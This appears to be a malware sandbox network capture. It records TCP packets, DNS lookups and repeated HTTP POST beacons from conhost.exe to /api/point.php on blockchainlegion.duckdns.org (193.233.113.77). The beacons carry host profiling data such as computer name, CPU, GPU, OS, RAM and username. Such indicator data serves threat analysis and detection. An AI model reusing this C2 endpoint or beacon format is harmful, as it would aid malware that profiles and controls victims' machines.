                                    Jan 12, 2025 17:38:37.290340900 CET4973280192.168.2.4193.233.113.77
                                    Jan 12, 2025 17:38:40.379921913 CET4973280192.168.2.4193.233.113.77
                                    Jan 12, 2025 17:38:40.379961967 CET4973280192.168.2.4193.233.113.77
                                    Jan 12, 2025 17:38:40.384757996 CET8049732193.233.113.77192.168.2.4
                                    Jan 12, 2025 17:38:40.384772062 CET8049732193.233.113.77192.168.2.4
                                    Jan 12, 2025 17:38:40.594120026 CET8049732193.233.113.77192.168.2.4
                                    Jan 12, 2025 17:38:40.692039967 CET4973280192.168.2.4193.233.113.77
                                    Jan 12, 2025 17:38:42.738411903 CET4973280192.168.2.4193.233.113.77
                                    Jan 12, 2025 17:38:42.738526106 CET4973280192.168.2.4193.233.113.77
                                    Jan 12, 2025 17:38:42.743253946 CET8049732193.233.113.77192.168.2.4
                                    Jan 12, 2025 17:38:42.743362904 CET8049732193.233.113.77192.168.2.4
                                    Jan 12, 2025 17:38:43.109447002 CET8049732193.233.113.77192.168.2.4
                                    Jan 12, 2025 17:38:43.190018892 CET4973280192.168.2.4193.233.113.77
                                    Jan 12, 2025 17:38:46.301794052 CET4973280192.168.2.4193.233.113.77
                                    Jan 12, 2025 17:38:46.301820040 CET4973280192.168.2.4193.233.113.77
                                    Jan 12, 2025 17:38:46.306595087 CET8049732193.233.113.77192.168.2.4
                                    Jan 12, 2025 17:38:46.306606054 CET8049732193.233.113.77192.168.2.4
                                    Jan 12, 2025 17:38:46.674504042 CET8049732193.233.113.77192.168.2.4
                                    Jan 12, 2025 17:38:46.799348116 CET4973280192.168.2.4193.233.113.77
                                    Jan 12, 2025 17:38:49.646140099 CET4973280192.168.2.4193.233.113.77
                                    Jan 12, 2025 17:38:49.646140099 CET4973280192.168.2.4193.233.113.77
                                    Jan 12, 2025 17:38:49.651122093 CET8049732193.233.113.77192.168.2.4
                                    Jan 12, 2025 17:38:49.651134968 CET8049732193.233.113.77192.168.2.4
                                    Jan 12, 2025 17:38:50.017112970 CET8049732193.233.113.77192.168.2.4
                                    Jan 12, 2025 17:38:50.092758894 CET4973280192.168.2.4193.233.113.77
                                    Jan 12, 2025 17:38:53.017200947 CET4973280192.168.2.4193.233.113.77
                                    Jan 12, 2025 17:38:53.017251015 CET4973280192.168.2.4193.233.113.77
                                    Jan 12, 2025 17:38:53.022211075 CET8049732193.233.113.77192.168.2.4
                                    Jan 12, 2025 17:38:53.022228956 CET8049732193.233.113.77192.168.2.4
                                    Jan 12, 2025 17:38:53.231898069 CET8049732193.233.113.77192.168.2.4
                                    Jan 12, 2025 17:38:53.299415112 CET4973280192.168.2.4193.233.113.77
                                    Jan 12, 2025 17:38:54.954823971 CET4973280192.168.2.4193.233.113.77
                                    Jan 12, 2025 17:38:54.955024958 CET4973280192.168.2.4193.233.113.77
                                    Jan 12, 2025 17:38:54.959923029 CET8049732193.233.113.77192.168.2.4
                                    Jan 12, 2025 17:38:54.960050106 CET8049732193.233.113.77192.168.2.4
                                    Jan 12, 2025 17:38:55.326200008 CET8049732193.233.113.77192.168.2.4
                                    Jan 12, 2025 17:38:55.393130064 CET4973280192.168.2.4193.233.113.77
                                    Jan 12, 2025 17:38:56.989052057 CET4973280192.168.2.4193.233.113.77
                                    Jan 12, 2025 17:38:56.989339113 CET4973280192.168.2.4193.233.113.77
                                    Jan 12, 2025 17:38:57.148298025 CET8049732193.233.113.77192.168.2.4
                                    Jan 12, 2025 17:38:57.148313046 CET8049732193.233.113.77192.168.2.4
                                    Jan 12, 2025 17:38:57.356446028 CET8049732193.233.113.77192.168.2.4
                                    Jan 12, 2025 17:38:57.502525091 CET4973280192.168.2.4193.233.113.77
                                    Jan 12, 2025 17:38:59.352034092 CET4973280192.168.2.4193.233.113.77
                                    Jan 12, 2025 17:38:59.352082014 CET4973280192.168.2.4193.233.113.77
                                    Jan 12, 2025 17:38:59.356944084 CET8049732193.233.113.77192.168.2.4
                                    Jan 12, 2025 17:38:59.356964111 CET8049732193.233.113.77192.168.2.4
                                    Jan 12, 2025 17:38:59.567553043 CET8049732193.233.113.77192.168.2.4
                                    Jan 12, 2025 17:38:59.693026066 CET4973280192.168.2.4193.233.113.77
                                    Jan 12, 2025 17:39:01.303641081 CET4973280192.168.2.4193.233.113.77
                                    Jan 12, 2025 17:39:01.303641081 CET4973280192.168.2.4193.233.113.77
                                    Jan 12, 2025 17:39:01.308680058 CET8049732193.233.113.77192.168.2.4
                                    Jan 12, 2025 17:39:01.308722973 CET8049732193.233.113.77192.168.2.4
                                    Jan 12, 2025 17:39:01.675405979 CET8049732193.233.113.77192.168.2.4
                                    Jan 12, 2025 17:39:01.799415112 CET4973280192.168.2.4193.233.113.77
                                    Jan 12, 2025 17:39:04.713134050 CET4973280192.168.2.4193.233.113.77
                                    Jan 12, 2025 17:39:04.713165998 CET4973280192.168.2.4193.233.113.77
                                    Jan 12, 2025 17:39:04.717912912 CET8049732193.233.113.77192.168.2.4
                                    Jan 12, 2025 17:39:04.717958927 CET8049732193.233.113.77192.168.2.4
                                    Jan 12, 2025 17:39:05.082638025 CET8049732193.233.113.77192.168.2.4
                                    Jan 12, 2025 17:39:05.190054893 CET4973280192.168.2.4193.233.113.77
                                    Jan 12, 2025 17:39:06.945420980 CET4973280192.168.2.4193.233.113.77
                                    Jan 12, 2025 17:39:06.945441961 CET4973280192.168.2.4193.233.113.77
                                    Jan 12, 2025 17:39:06.950258970 CET8049732193.233.113.77192.168.2.4
                                    Jan 12, 2025 17:39:06.950269938 CET8049732193.233.113.77192.168.2.4
                                    Jan 12, 2025 17:39:07.318682909 CET8049732193.233.113.77192.168.2.4
                                    Jan 12, 2025 17:39:07.502604961 CET4973280192.168.2.4193.233.113.77
                                    Jan 12, 2025 17:39:09.196762085 CET4973280192.168.2.4193.233.113.77
                                    Jan 12, 2025 17:39:09.196763039 CET4973280192.168.2.4193.233.113.77
                                    Jan 12, 2025 17:39:09.202507019 CET8049732193.233.113.77192.168.2.4
                                    Jan 12, 2025 17:39:09.202522039 CET8049732193.233.113.77192.168.2.4
                                    Jan 12, 2025 17:39:09.565880060 CET8049732193.233.113.77192.168.2.4
                                    Jan 12, 2025 17:39:09.690119982 CET4973280192.168.2.4193.233.113.77
                                    Jan 12, 2025 17:39:10.702435970 CET8049732193.233.113.77192.168.2.4
                                    Jan 12, 2025 17:39:10.702502966 CET8049732193.233.113.77192.168.2.4
                                    Jan 12, 2025 17:39:10.702513933 CET4973280192.168.2.4193.233.113.77
                                    Jan 12, 2025 17:39:10.702610016 CET4973280192.168.2.4193.233.113.77
                                    Jan 12, 2025 17:39:11.983525038 CET4973280192.168.2.4193.233.113.77
                                    Jan 12, 2025 17:39:11.983609915 CET4973280192.168.2.4193.233.113.77
                                    Jan 12, 2025 17:39:11.988456011 CET8049732193.233.113.77192.168.2.4
                                    Jan 12, 2025 17:39:11.988488913 CET8049732193.233.113.77192.168.2.4
                                    Jan 12, 2025 17:39:12.354258060 CET8049732193.233.113.77192.168.2.4
                                    Jan 12, 2025 17:39:12.502595901 CET4973280192.168.2.4193.233.113.77
                                    Jan 12, 2025 17:39:15.086321115 CET4973280192.168.2.4193.233.113.77
                                    Jan 12, 2025 17:39:15.086411953 CET4973280192.168.2.4193.233.113.77
                                    Jan 12, 2025 17:39:15.131720066 CET8049732193.233.113.77192.168.2.4
                                    Jan 12, 2025 17:39:15.131732941 CET8049732193.233.113.77192.168.2.4
                                    Jan 12, 2025 17:39:15.336731911 CET8049732193.233.113.77192.168.2.4
                                    Jan 12, 2025 17:39:15.460072994 CET4973280192.168.2.4193.233.113.77
                                    Jan 12, 2025 17:39:18.202239990 CET4973280192.168.2.4193.233.113.77
                                    Jan 12, 2025 17:39:18.202373028 CET4973280192.168.2.4193.233.113.77
                                    Jan 12, 2025 17:39:18.207118034 CET8049732193.233.113.77192.168.2.4
                                    Jan 12, 2025 17:39:18.207173109 CET8049732193.233.113.77192.168.2.4
                                    Jan 12, 2025 17:39:18.575197935 CET8049732193.233.113.77192.168.2.4
                                    Jan 12, 2025 17:39:18.691076994 CET4973280192.168.2.4193.233.113.77
                                    Jan 12, 2025 17:39:21.229813099 CET4973280192.168.2.4193.233.113.77
                                    Jan 12, 2025 17:39:21.229861975 CET4973280192.168.2.4193.233.113.77
                                    Jan 12, 2025 17:39:21.234714985 CET8049732193.233.113.77192.168.2.4
                                    Jan 12, 2025 17:39:21.234728098 CET8049732193.233.113.77192.168.2.4
                                    Jan 12, 2025 17:39:21.601856947 CET8049732193.233.113.77192.168.2.4
                                    Jan 12, 2025 17:39:21.647281885 CET4973280192.168.2.4193.233.113.77
                                    Jan 12, 2025 17:39:24.564680099 CET4973280192.168.2.4193.233.113.77
                                    Jan 12, 2025 17:39:24.564783096 CET4973280192.168.2.4193.233.113.77
                                    Jan 12, 2025 17:39:24.569631100 CET8049732193.233.113.77192.168.2.4
                                    Jan 12, 2025 17:39:24.569645882 CET8049732193.233.113.77192.168.2.4
                                    Jan 12, 2025 17:39:24.934196949 CET8049732193.233.113.77192.168.2.4
                                    Jan 12, 2025 17:39:25.002633095 CET4973280192.168.2.4193.233.113.77
                                    Jan 12, 2025 17:39:27.656596899 CET4973280192.168.2.4193.233.113.77
                                    Jan 12, 2025 17:39:27.656596899 CET4973280192.168.2.4193.233.113.77
                                    Jan 12, 2025 17:39:27.661381960 CET8049732193.233.113.77192.168.2.4
                                    Jan 12, 2025 17:39:27.661391973 CET8049732193.233.113.77192.168.2.4
                                    Jan 12, 2025 17:39:28.025451899 CET8049732193.233.113.77192.168.2.4
                                    Jan 12, 2025 17:39:28.190202951 CET4973280192.168.2.4193.233.113.77
                                    Jan 12, 2025 17:39:30.870609045 CET4973280192.168.2.4193.233.113.77
                                    Jan 12, 2025 17:39:30.870654106 CET4973280192.168.2.4193.233.113.77
                                    Jan 12, 2025 17:39:30.875447035 CET8049732193.233.113.77192.168.2.4
                                    Jan 12, 2025 17:39:30.875463009 CET8049732193.233.113.77192.168.2.4
                                    Jan 12, 2025 17:39:31.242050886 CET8049732193.233.113.77192.168.2.4
                                    Jan 12, 2025 17:39:31.299546003 CET4973280192.168.2.4193.233.113.77
                                    Jan 12, 2025 17:39:34.035517931 CET4973280192.168.2.4193.233.113.77
                                    Jan 12, 2025 17:39:34.035662889 CET4973280192.168.2.4193.233.113.77
                                    Jan 12, 2025 17:39:34.040364981 CET8049732193.233.113.77192.168.2.4
                                    Jan 12, 2025 17:39:34.040400982 CET8049732193.233.113.77192.168.2.4
                                    Jan 12, 2025 17:39:34.408330917 CET8049732193.233.113.77192.168.2.4
                                    Jan 12, 2025 17:39:34.502677917 CET4973280192.168.2.4193.233.113.77
                                    Jan 12, 2025 17:39:37.069493055 CET4973280192.168.2.4193.233.113.77
                                    Jan 12, 2025 17:39:37.069586992 CET4973280192.168.2.4193.233.113.77
                                    Jan 12, 2025 17:39:37.075778961 CET8049732193.233.113.77192.168.2.4
                                    Jan 12, 2025 17:39:37.075793982 CET8049732193.233.113.77192.168.2.4
                                    Jan 12, 2025 17:39:37.441191912 CET8049732193.233.113.77192.168.2.4
                                    Jan 12, 2025 17:39:37.502693892 CET4973280192.168.2.4193.233.113.77
                                    Jan 12, 2025 17:39:39.883645058 CET4973280192.168.2.4193.233.113.77
                                    Jan 12, 2025 17:39:39.883892059 CET4973280192.168.2.4193.233.113.77
                                    Jan 12, 2025 17:39:39.962496996 CET8049732193.233.113.77192.168.2.4
                                    Jan 12, 2025 17:39:39.962531090 CET8049732193.233.113.77192.168.2.4
                                    Jan 12, 2025 17:39:40.168404102 CET8049732193.233.113.77192.168.2.4
                                    Jan 12, 2025 17:39:40.299595118 CET4973280192.168.2.4193.233.113.77
                                    Jan 12, 2025 17:39:42.467192888 CET4973280192.168.2.4193.233.113.77
                                    Jan 12, 2025 17:39:42.467279911 CET4973280192.168.2.4193.233.113.77
                                    Jan 12, 2025 17:39:42.472943068 CET8049732193.233.113.77192.168.2.4
                                    Jan 12, 2025 17:39:42.472980022 CET8049732193.233.113.77192.168.2.4
                                    Jan 12, 2025 17:39:42.681922913 CET8049732193.233.113.77192.168.2.4
                                    Jan 12, 2025 17:39:42.855281115 CET4973280192.168.2.4193.233.113.77
                                    Jan 12, 2025 17:39:45.304141045 CET4973280192.168.2.4193.233.113.77
                                    Jan 12, 2025 17:39:45.304430008 CET4973280192.168.2.4193.233.113.77
                                    Jan 12, 2025 17:39:45.309098005 CET8049732193.233.113.77192.168.2.4
                                    Jan 12, 2025 17:39:45.309201002 CET8049732193.233.113.77192.168.2.4
                                    Jan 12, 2025 17:39:45.673830032 CET8049732193.233.113.77192.168.2.4
                                    Jan 12, 2025 17:39:45.799839020 CET4973280192.168.2.4193.233.113.77
                                    Jan 12, 2025 17:39:48.381927013 CET4973280192.168.2.4193.233.113.77
                                    Jan 12, 2025 17:39:48.381972075 CET4973280192.168.2.4193.233.113.77
                                    Jan 12, 2025 17:39:48.394234896 CET8049732193.233.113.77192.168.2.4
                                    Jan 12, 2025 17:39:48.394248009 CET8049732193.233.113.77192.168.2.4
                                    Jan 12, 2025 17:39:48.602425098 CET8049732193.233.113.77192.168.2.4
                                    Jan 12, 2025 17:39:48.799617052 CET4973280192.168.2.4193.233.113.77
                                    Jan 12, 2025 17:39:51.222837925 CET4973280192.168.2.4193.233.113.77
                                    Jan 12, 2025 17:39:51.222837925 CET4973280192.168.2.4193.233.113.77
                                    Jan 12, 2025 17:39:51.227767944 CET8049732193.233.113.77192.168.2.4
                                    Jan 12, 2025 17:39:51.227804899 CET8049732193.233.113.77192.168.2.4
                                    Jan 12, 2025 17:39:51.594625950 CET8049732193.233.113.77192.168.2.4
                                    Jan 12, 2025 17:39:51.690376043 CET4973280192.168.2.4193.233.113.77
                                    Jan 12, 2025 17:39:54.243062973 CET4973280192.168.2.4193.233.113.77
                                    Jan 12, 2025 17:39:54.243134975 CET4973280192.168.2.4193.233.113.77
                                    Jan 12, 2025 17:39:54.248049021 CET8049732193.233.113.77192.168.2.4
                                    Jan 12, 2025 17:39:54.248068094 CET8049732193.233.113.77192.168.2.4
                                    Jan 12, 2025 17:39:54.613835096 CET8049732193.233.113.77192.168.2.4
                                    Jan 12, 2025 17:39:54.690268040 CET4973280192.168.2.4193.233.113.77
                                    Jan 12, 2025 17:39:57.271044970 CET4973280192.168.2.4193.233.113.77
                                    Jan 12, 2025 17:39:57.271044970 CET4973280192.168.2.4193.233.113.77
                                    Jan 12, 2025 17:39:57.276010036 CET8049732193.233.113.77192.168.2.4
                                    Jan 12, 2025 17:39:57.276026011 CET8049732193.233.113.77192.168.2.4
                                    Jan 12, 2025 17:39:57.642462015 CET8049732193.233.113.77192.168.2.4
                                    Jan 12, 2025 17:39:57.691524982 CET4973280192.168.2.4193.233.113.77
                                    Jan 12, 2025 17:40:00.363336086 CET4973280192.168.2.4193.233.113.77
                                    Jan 12, 2025 17:40:00.363337040 CET4973280192.168.2.4193.233.113.77
                                    Jan 12, 2025 17:40:00.369561911 CET8049732193.233.113.77192.168.2.4
                                    Jan 12, 2025 17:40:00.369932890 CET8049732193.233.113.77192.168.2.4
                                    Jan 12, 2025 17:40:00.586632967 CET8049732193.233.113.77192.168.2.4
                                    Jan 12, 2025 17:40:00.647607088 CET4973280192.168.2.4193.233.113.77
                                    Jan 12, 2025 17:40:03.191436052 CET4973280192.168.2.4193.233.113.77
                                    Jan 12, 2025 17:40:03.191437006 CET4973280192.168.2.4193.233.113.77
                                    Jan 12, 2025 17:40:03.196516037 CET8049732193.233.113.77192.168.2.4
                                    Jan 12, 2025 17:40:03.196538925 CET8049732193.233.113.77192.168.2.4
                                    Jan 12, 2025 17:40:03.563396931 CET8049732193.233.113.77192.168.2.4
                                    Jan 12, 2025 17:40:03.690330982 CET4973280192.168.2.4193.233.113.77
                                    Jan 12, 2025 17:40:06.121020079 CET4973280192.168.2.4193.233.113.77
                                    Jan 12, 2025 17:40:06.121020079 CET4973280192.168.2.4193.233.113.77
                                    Jan 12, 2025 17:40:06.126008034 CET8049732193.233.113.77192.168.2.4
                                    Jan 12, 2025 17:40:06.126025915 CET8049732193.233.113.77192.168.2.4
                                    Jan 12, 2025 17:40:06.489887953 CET8049732193.233.113.77192.168.2.4
                                    Jan 12, 2025 17:40:06.690428019 CET4973280192.168.2.4193.233.113.77
                                    Jan 12, 2025 17:40:09.435264111 CET4973280192.168.2.4193.233.113.77
                                    Jan 12, 2025 17:40:09.435328007 CET4973280192.168.2.4193.233.113.77
                                    Jan 12, 2025 17:40:09.440429926 CET8049732193.233.113.77192.168.2.4
                                    Jan 12, 2025 17:40:09.440474033 CET8049732193.233.113.77192.168.2.4
                                    Jan 12, 2025 17:40:09.826176882 CET8049732193.233.113.77192.168.2.4
                                    Jan 12, 2025 17:40:10.002840042 CET4973280192.168.2.4193.233.113.77
                                    Jan 12, 2025 17:40:12.363176107 CET4973280192.168.2.4193.233.113.77
                                    Jan 12, 2025 17:40:12.363245964 CET4973280192.168.2.4193.233.113.77
                                    Jan 12, 2025 17:40:12.368283987 CET8049732193.233.113.77192.168.2.4
                                    Jan 12, 2025 17:40:12.368324995 CET8049732193.233.113.77192.168.2.4
                                    Jan 12, 2025 17:40:12.586406946 CET8049732193.233.113.77192.168.2.4
                                    Jan 12, 2025 17:40:12.691365004 CET4973280192.168.2.4193.233.113.77
                                    Jan 12, 2025 17:40:15.413937092 CET4973280192.168.2.4193.233.113.77
                                    Jan 12, 2025 17:40:15.413937092 CET4973280192.168.2.4193.233.113.77
                                    Jan 12, 2025 17:40:15.419095993 CET8049732193.233.113.77192.168.2.4
                                    Jan 12, 2025 17:40:15.419137955 CET8049732193.233.113.77192.168.2.4
                                    Jan 12, 2025 17:40:15.786204100 CET8049732193.233.113.77192.168.2.4
                                    Jan 12, 2025 17:40:16.002911091 CET4973280192.168.2.4193.233.113.77
                                    Jan 12, 2025 17:40:20.791327953 CET8049732193.233.113.77192.168.2.4
                                    Jan 12, 2025 17:40:20.791644096 CET4973280192.168.2.4193.233.113.77
                                    TimestampSource PortDest PortSource IPDest IP
                                    Jan 12, 2025 17:38:27.790919065 CET5189353192.168.2.41.1.1.1
                                    Jan 12, 2025 17:38:27.797873974 CET53518931.1.1.1192.168.2.4
                                    Jan 12, 2025 17:38:29.208605051 CET5795753192.168.2.41.1.1.1
                                    Jan 12, 2025 17:38:29.310198069 CET53579571.1.1.1192.168.2.4
                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                    Jan 12, 2025 17:38:27.790919065 CET192.168.2.41.1.1.10x8561Standard query (0)polygon-rpc.comA (IP address)IN (0x0001)false
                                    Jan 12, 2025 17:38:29.208605051 CET192.168.2.41.1.1.10xbab5Standard query (0)blockchainlegion.duckdns.orgA (IP address)IN (0x0001)false
                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                    Jan 12, 2025 17:38:27.797873974 CET1.1.1.1192.168.2.40x8561No error (0)polygon-rpc.com173.244.207.29A (IP address)IN (0x0001)false
                                    Jan 12, 2025 17:38:29.310198069 CET1.1.1.1192.168.2.40xbab5No error (0)blockchainlegion.duckdns.org193.233.113.77A (IP address)IN (0x0001)false
                                    • polygon-rpc.com
                                    • blockchainlegion.duckdns.org
                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    0192.168.2.449732193.233.113.77807720C:\Windows\System32\conhost.exe
                                    TimestampBytes transferredDirectionData
                                    Jan 12, 2025 17:38:29.316138983 CET145OUTPOST /api/point.php HTTP/1.1
                                    Connection: Keep-Alive
                                    Content-Type: application/json
                                    Content-Length: 270
                                    Host: blockchainlegion.duckdns.org
                                    Jan 12, 2025 17:38:29.316138983 CET270OUTData Raw: 7b 22 63 6f 6d 70 75 74 65 72 6e 61 6d 65 22 3a 22 31 34 31 37 30 30 22 2c 22 63 6f 72 65 73 22 3a 34 2c 22 63 70 75 22 3a 22 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 22 2c
                                    Data Ascii: {"computername":"141700","cores":4,"cpu":"Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz","gpu":"ZFSWM","ip":"","os":"Microsoft Windows 10 Pro","ram":"8191","status":"2","username":"user","version":"3.4.3","vram":"0","windowTitle":"Program Manager |
                                    Jan 12, 2025 17:38:29.996419907 CET203INHTTP/1.1 200 OK
                                    Date: Sun, 12 Jan 2025 16:38:29 GMT
                                    Server: Apache/2.4.52 (Ubuntu)
                                    Content-Length: 0
                                    Keep-Alive: timeout=5, max=100
                                    Connection: Keep-Alive
                                    Content-Type: text/plain;charset=UTF-8
                                    Jan 12, 2025 17:38:33.177155018 CET208OUTPOST /api/point.php HTTP/1.1
                                    Connection: Keep-Alive
                                    Content-Type: application/json
                                    User-Agent: :\Users\user\AppData\Local\Temp\uteugvdfldgq.xml
                                    Content-Length: 270
                                    Host: blockchainlegion.duckdns.org
                                    Jan 12, 2025 17:38:33.177155018 CET270OUTData Raw: 7b 22 63 6f 6d 70 75 74 65 72 6e 61 6d 65 22 3a 22 31 34 31 37 30 30 22 2c 22 63 6f 72 65 73 22 3a 34 2c 22 63 70 75 22 3a 22 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 22 2c
                                    Data Ascii: {"computername":"141700","cores":4,"cpu":"Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz","gpu":"ZFSWM","ip":"","os":"Microsoft Windows 10 Pro","ram":"8191","status":"2","username":"user","version":"3.4.3","vram":"0","windowTitle":"Program Manager |
                                    Jan 12, 2025 17:38:33.393832922 CET202INHTTP/1.1 200 OK
                                    Date: Sun, 12 Jan 2025 16:38:33 GMT
                                    Server: Apache/2.4.52 (Ubuntu)
                                    Content-Length: 0
                                    Keep-Alive: timeout=5, max=99
                                    Connection: Keep-Alive
                                    Content-Type: text/plain;charset=UTF-8
                                    Jan 12, 2025 17:38:37.019069910 CET208OUTPOST /api/point.php HTTP/1.1
                                    Connection: Keep-Alive
                                    Content-Type: application/json
                                    User-Agent: :\Users\user\AppData\Local\Temp\uteugvdfldgq.xml
                                    Content-Length: 270
                                    Host: blockchainlegion.duckdns.org
                                    Jan 12, 2025 17:38:37.019179106 CET270OUTData Raw: 7b 22 63 6f 6d 70 75 74 65 72 6e 61 6d 65 22 3a 22 31 34 31 37 30 30 22 2c 22 63 6f 72 65 73 22 3a 34 2c 22 63 70 75 22 3a 22 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 22 2c
                                    Data Ascii: {"computername":"141700","cores":4,"cpu":"Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz","gpu":"ZFSWM","ip":"","os":"Microsoft Windows 10 Pro","ram":"8191","status":"2","username":"user","version":"3.4.3","vram":"0","windowTitle":"Program Manager |
                                    Jan 12, 2025 17:38:37.233493090 CET202INHTTP/1.1 200 OK
                                    Date: Sun, 12 Jan 2025 16:38:37 GMT
                                    Server: Apache/2.4.52 (Ubuntu)
                                    Content-Length: 0
                                    Keep-Alive: timeout=5, max=98
                                    Connection: Keep-Alive
                                    Content-Type: text/plain;charset=UTF-8
                                    Jan 12, 2025 17:38:40.379921913 CET208OUTPOST /api/point.php HTTP/1.1
                                    Connection: Keep-Alive
                                    Content-Type: application/json
                                    User-Agent: :\Users\user\AppData\Local\Temp\uteugvdfldgq.xml
                                    Content-Length: 270
                                    Host: blockchainlegion.duckdns.org
                                    Jan 12, 2025 17:38:40.379961967 CET270OUTData Raw: 7b 22 63 6f 6d 70 75 74 65 72 6e 61 6d 65 22 3a 22 31 34 31 37 30 30 22 2c 22 63 6f 72 65 73 22 3a 34 2c 22 63 70 75 22 3a 22 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 22 2c
                                    Data Ascii: {"computername":"141700","cores":4,"cpu":"Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz","gpu":"ZFSWM","ip":"","os":"Microsoft Windows 10 Pro","ram":"8191","status":"2","username":"user","version":"3.4.3","vram":"0","windowTitle":"Program Manager |
                                    Jan 12, 2025 17:38:40.594120026 CET202INHTTP/1.1 200 OK
                                    Date: Sun, 12 Jan 2025 16:38:40 GMT
                                    Server: Apache/2.4.52 (Ubuntu)
                                    Content-Length: 0
                                    Keep-Alive: timeout=5, max=97
                                    Connection: Keep-Alive
                                    Content-Type: text/plain;charset=UTF-8
                                    Jan 12, 2025 17:38:42.738411903 CET208OUTPOST /api/point.php HTTP/1.1
                                    Connection: Keep-Alive
                                    Content-Type: application/json
                                    User-Agent: :\Users\user\AppData\Local\Temp\uteugvdfldgq.xml
                                    Content-Length: 270
                                    Host: blockchainlegion.duckdns.org
                                    Jan 12, 2025 17:38:42.738526106 CET270OUTData Raw: 7b 22 63 6f 6d 70 75 74 65 72 6e 61 6d 65 22 3a 22 31 34 31 37 30 30 22 2c 22 63 6f 72 65 73 22 3a 34 2c 22 63 70 75 22 3a 22 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 22 2c
                                    Data Ascii: {"computername":"141700","cores":4,"cpu":"Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz","gpu":"ZFSWM","ip":"","os":"Microsoft Windows 10 Pro","ram":"8191","status":"2","username":"user","version":"3.4.3","vram":"0","windowTitle":"Program Manager |
                                    Jan 12, 2025 17:38:43.109447002 CET202INHTTP/1.1 200 OK
                                    Date: Sun, 12 Jan 2025 16:38:42 GMT
                                    Server: Apache/2.4.52 (Ubuntu)
                                    Content-Length: 0
                                    Keep-Alive: timeout=5, max=96
                                    Connection: Keep-Alive
                                    Content-Type: text/plain;charset=UTF-8
                                    Jan 12, 2025 17:38:46.301794052 CET208OUTPOST /api/point.php HTTP/1.1
                                    Connection: Keep-Alive
                                    Content-Type: application/json
                                    User-Agent: :\Users\user\AppData\Local\Temp\uteugvdfldgq.xml
                                    Content-Length: 270
                                    Host: blockchainlegion.duckdns.org
                                    Jan 12, 2025 17:38:46.301820040 CET270OUTData Raw: 7b 22 63 6f 6d 70 75 74 65 72 6e 61 6d 65 22 3a 22 31 34 31 37 30 30 22 2c 22 63 6f 72 65 73 22 3a 34 2c 22 63 70 75 22 3a 22 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 22 2c
                                    Data Ascii: {"computername":"141700","cores":4,"cpu":"Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz","gpu":"ZFSWM","ip":"","os":"Microsoft Windows 10 Pro","ram":"8191","status":"2","username":"user","version":"3.4.3","vram":"0","windowTitle":"Program Manager |
                                    Jan 12, 2025 17:38:46.674504042 CET202INHTTP/1.1 200 OK
                                    Date: Sun, 12 Jan 2025 16:38:46 GMT
                                    Server: Apache/2.4.52 (Ubuntu)
                                    Content-Length: 0
                                    Keep-Alive: timeout=5, max=95
                                    Connection: Keep-Alive
                                    Content-Type: text/plain;charset=UTF-8
                                    Jan 12, 2025 17:38:49.646140099 CET208OUTPOST /api/point.php HTTP/1.1
                                    Connection: Keep-Alive
                                    Content-Type: application/json
                                    User-Agent: :\Users\user\AppData\Local\Temp\uteugvdfldgq.xml
                                    Content-Length: 270
                                    Host: blockchainlegion.duckdns.org
                                    Jan 12, 2025 17:38:49.646140099 CET270OUTData Raw: 7b 22 63 6f 6d 70 75 74 65 72 6e 61 6d 65 22 3a 22 31 34 31 37 30 30 22 2c 22 63 6f 72 65 73 22 3a 34 2c 22 63 70 75 22 3a 22 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 22 2c
                                    Data Ascii: {"computername":"141700","cores":4,"cpu":"Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz","gpu":"ZFSWM","ip":"","os":"Microsoft Windows 10 Pro","ram":"8191","status":"2","username":"user","version":"3.4.3","vram":"0","windowTitle":"Program Manager |
                                    Jan 12, 2025 17:38:50.017112970 CET202INHTTP/1.1 200 OK
                                    Date: Sun, 12 Jan 2025 16:38:49 GMT
                                    Server: Apache/2.4.52 (Ubuntu)
                                    Content-Length: 0
                                    Keep-Alive: timeout=5, max=94
                                    Connection: Keep-Alive
                                    Content-Type: text/plain;charset=UTF-8
                                    Jan 12, 2025 17:38:53.017200947 CET208OUTPOST /api/point.php HTTP/1.1
                                    Connection: Keep-Alive
                                    Content-Type: application/json
                                    User-Agent: :\Users\user\AppData\Local\Temp\uteugvdfldgq.xml
                                    Content-Length: 270
                                    Host: blockchainlegion.duckdns.org
                                    Jan 12, 2025 17:38:53.017251015 CET270OUTData Raw: 7b 22 63 6f 6d 70 75 74 65 72 6e 61 6d 65 22 3a 22 31 34 31 37 30 30 22 2c 22 63 6f 72 65 73 22 3a 34 2c 22 63 70 75 22 3a 22 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 22 2c
                                    Data Ascii: {"computername":"141700","cores":4,"cpu":"Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz","gpu":"ZFSWM","ip":"","os":"Microsoft Windows 10 Pro","ram":"8191","status":"2","username":"user","version":"3.4.3","vram":"0","windowTitle":"Program Manager |
